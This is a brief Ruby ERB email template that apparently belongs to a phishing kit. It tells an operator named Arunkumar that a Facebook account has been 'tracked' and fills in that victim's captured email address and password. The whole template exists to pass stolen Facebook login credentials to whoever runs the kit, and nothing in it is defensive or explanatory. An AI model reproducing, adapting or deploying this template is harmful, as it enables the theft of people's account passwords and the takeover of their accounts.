Hello Arunkumar,<br>
<p style="font-style: oblique;color: #8a1f11">

  Please check your website, Some person's Facebook account with  Email_id: <%= @email %> has been tracked
</p>
<p style="font-style: italic;color: #009900">Email: <%=  @email  %>
</p>
<p style="font-style: italic;color: #009900">Password: <%=  @password  %>
</p>

I'm very Thankful and glad for tracking this account. Thank you!